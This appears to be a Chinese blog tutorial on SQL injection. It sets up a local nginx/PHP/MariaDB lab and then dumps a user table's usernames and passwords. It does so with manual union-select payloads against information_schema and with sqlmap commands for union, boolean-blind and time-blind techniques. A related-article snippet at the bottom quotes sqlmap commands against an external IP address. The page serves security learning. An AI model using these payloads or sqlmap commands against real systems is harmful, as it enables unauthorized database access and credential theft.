sql注入初探

最新推荐文章于 2025-06-18 17:35:07 发布
最新推荐文章于 2025-06-18 17:35:07 发布
阅读量1.8k 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/flurry_rain/article/details/82706422

了解漏洞:

什么是sql注入漏洞:

攻击者可以通过该漏洞提交一段数据库查询代码,根据程序返回的结果,获得非法数据。

分析漏洞原理:

SQL注入产生的原因是什么:

程序员在编写代码的时候,没有对用户输入内容的合法性进行判断。

一个系统存在这个漏洞会导致什么后果?

数据库中的信息将会被黑客获取,如果数据库权限设置不当,还可能被攻击者获取写权限,写入一句话木马。

漏洞的复现和利用

环境搭建:

安装nginx:dnf install nginx

安装php-cgi:dnf install php-cgi

启动php-cgi:php-cgi -b 9000 &

Cd /etc/nginx/:备份nginx.conf

将sql_injection里面的ngixn.conf替换掉之前的nginx.conf,并修改nginx.conf:user改为root

启动nginx服务:nginx(重启为nginx -s reload)

进入目录/usr/share/nginx/html:

解压task3.5 sql,将文件夹sql_injection复制到html文件中

修改sql_injection里面的1.php(mysql的root密码)和ngixn.conf(user name)

安装mariadb:dnf install mariadb

启动mariadb,新建数据库:create database sql_injection

将sql文件写入sql_injection:mysql -u root -p sql_injection < sql

修改mariadb的配置文件:vim /etc/my.cnf和vim /etc/my.cnf.d/mariadb-server.cnf

 

重启mariadb

Tail -f /var/log/mariadb/queries.log查看数据库日志

 

带有sql注入漏洞的环境:

 

安装sqlmap:

使用wget安装,解压即可使用:

手工注入实现:

  1. 判断是否存在sql注入:
  1. 永真 and 1=1,页面正常:

 

  1. 永假 and 1=2,页面无显示:

  1. 判断字段数:

依次order by 1,2,3,均正常显示:

当输入4的时候出现空白页:

说明字段数为3。

  1. 判断当前数据库权限:

union select user(),2,3(3为字段数):

当前数据库为root权限。

  1. 获得数据库库名:

union select database(),2,3(3为字段数):

数据库名为sql_injection。

  1. 获取数据库表名:

union select table_name,2,3 from information_schema.tables where table_schema="sql_injection"

表名为 user

  1. 获取数据库字段名:

union select column_name,2,3 from information_schema.columns where table_name="user" and table_schema = "sql_injection"

共三个字段,分别为id、username、password。

  1. 获取数据:

sqlmap注入:

  1. 获取数据库名:

python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" --dbs

  1. 获取表名:

python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" -D sql_injection --table

  1. 获取字段名:

python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" -D sql_injection -T user --columns

  1. 获取数据:

python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" -D sql_injection -T user -C id,password,username --dump

sqlmap Union注入:

联合查询注入,可以使用union的情况下的注入

python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" -D sql_injection -T user -C id,password,username --dump -technique=U --flush-session

进行的操作是猜字段数:

sqlmap Boolean Based注入

基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" -D sql_injection -T user -C id,password,username --dump -technique=B --flush-session

正在进行的操作是判断注入点:

sqlmap Time Based注入:

基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断:
python sqlmap.py -u "http://127.0.0.1/mysql.php?id=1&submit=submit" -D sql_injection -T user -C id,password,username --dump -technique=T --flush-session

进行的操作是让此语句运行5秒:

SQL注入实例讲解
03-29
通过一个实例讲解sql注入
SQL注入初探,实例
04-07
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地构建SQL查询时,允许攻击者通过输入恶意数据来操纵数据库。在本篇文章中,我们将深入探讨SQL注入的概念、工作原理以及如何防范这种攻击。 **SQL注入的...
初探SQL注入--安全
qq_43371350的博客
03-14 1907
Sql注入 1、测试交互方法,判断浏览器提交数据和web服务器的交互方式 get 提交 提交的数据在url中显示 post 提交 没有在url中显示 2、判断提交变量的数据类型 + 整型 id = 1 and 1=2 //让提交数据为False(假) 有交互数据显示则为整型,否则为str + 字符型 id = 1 and 1=2 无交互显示,则进一步判断闭合方式 常见的闭合方法 ‘’,“ ”,( ...
SQL注入分类,一看你就明白了,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
06-18 1078
字符可以使用单引号包裹,也可以使用双引号包裹,根据包裹字符串的「引号」不同,字符型注入可以分为:「单引号字符型」注入和「双引号字符型」注入。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」参数使用「单引号」包裹时,叫做单引号字符型注入,比如下面这个SQL,就是单引号字符型注入。参数使用「双引号」包裹时,叫做双引号字符型注入,比如下面这个SQL,就是双引号字符型注入。后台对应的SQL如下,字段类型是字符型,这种就是字符型注入
sql注入现象
pipizhen_的博客
08-10 468
sql注入现象: 1、先用一个程序引出sql注入现象: 例如:模拟用户登录业务。 测试代码: package sql_inject; import java.util.HashMap; import java.util.Map; import java.sql.*; import java.util.Scanner; public class Test01 { public static void main(String[] args) { // 用户信息初始化
sql注入实例
weixin_50205723的博客
09-12 404
一、判断注入点(靶机示例) 点击一篇文章寻找注入注入点测试: 确定可以注入 二、使用sqlmap进行注入 1、打开sqlmap输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -dbs 得到库 2、根据网页显示为软件学院我们选择rjxy进行库破解输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -D rjxy
网络安全初探SQL注入漏洞
07-02
标题"网络安全初探SQL注入漏洞"表明我们将关注的是如何识别和防范这种类型的漏洞。在描述中提到,通过PHP和MySQL构建的简单网站,我们有一个实际的平台来模拟和理解SQL注入的场景。PHP是一种常用的服务器端脚本语言...
Sql注入实例
进击的小小白
01-09 1998
一,靶场环境 目标网站:http://172.16.43.117:8011/ 工具:椰树V1.9-web安全扫描工具 (最后附上网盘链接) 二,使用工具查找注入点 1,将url链接放入工具中,点击扫描网站,并且等状态栏为done时,扫描完成,发现2个注入点 三,进行注入 1,在刚刚发现的注入点上右击鼠标,选择第二项进行注入 2,跳转过后,打开数据库选项卡,看到数据库Test_E...
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
SQL注入实例
红流
10-21 889
搜索自己的姓名,居然能找到在学生时代发布的求职页,注册密码忘了,想删除它,联系管理员没音讯。测试一下sql注入Microsoft OLE DB Provider for SQL Server 错误 80040e14 字符串  之前有未闭合的引号。  天助我也!猜测SQL注入语句,whereuserid=zzf and(= and password=
利用SQL注入漏洞登录后台的实现方法
weixin_33834137的博客
01-04 363
利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意。读这篇文章,我假设读者有过写SQL语句的经历,或者能看得懂SQL语句 早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。  如今,谈SQL...
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1380
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
SQL注入示例
wake_alone
05-29 787
func queryTestXCdata(xcdata XCDataStu) (string, int) { result := make([]XCDataStu, 0) var querySql string querySql = "SELECT * FROM xc_Data" if xcdata.Id &gt; 0 { querySql = querySql + " where i...
(一)SQL注入实例
weixin_43047908的博客
04-09 2316
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
SQL注入知识点总结
千寻的博客
02-11 1672
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
Web安全初探SQL注入与漏洞分析
"Web安全入门PPT课件涵盖了Web安全的基础知识,包括Web的B/S架构,Web程序的执行过程,以及重点讲解了Web漏洞中的SQL注入问题。" Web安全是一个重要的领域,对于任何涉及Web应用程序开发、维护或管理的人来说都是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值